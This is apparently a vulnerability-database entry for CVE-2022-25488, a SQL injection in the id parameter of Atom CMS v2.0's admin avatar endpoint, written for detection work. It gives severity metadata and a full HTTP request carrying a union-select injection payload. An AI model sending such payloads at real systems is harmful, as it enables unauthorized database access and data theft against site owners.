🔙 목록으로 돌아가기

CVE-2022-25488: Atom CMS v2.0 - SQL Injection

TitleAtom CMS v2.0 - SQL Injection
Authortheamanrawat
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
RemediationFixed in version Atom CMS v2.1
CVSS Score9.8
EPSS Score0.72376
CVE IDCVE-2022-25488
CWE IDCWE-89
Tags cve cve2022 sqli atom cms thedigitalcraft vkev vuln

🔍 Vulnerability Description

Atom CMS v2.0 was discovered to contain a SQL injection vulnerability via the id parameter in /admin/ajax/avatar.php.

🌐 HTTP Request

GET /admin/ajax/avatar.php?id=-1+union+select+md5(9089)%23 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-25488.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-25488.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A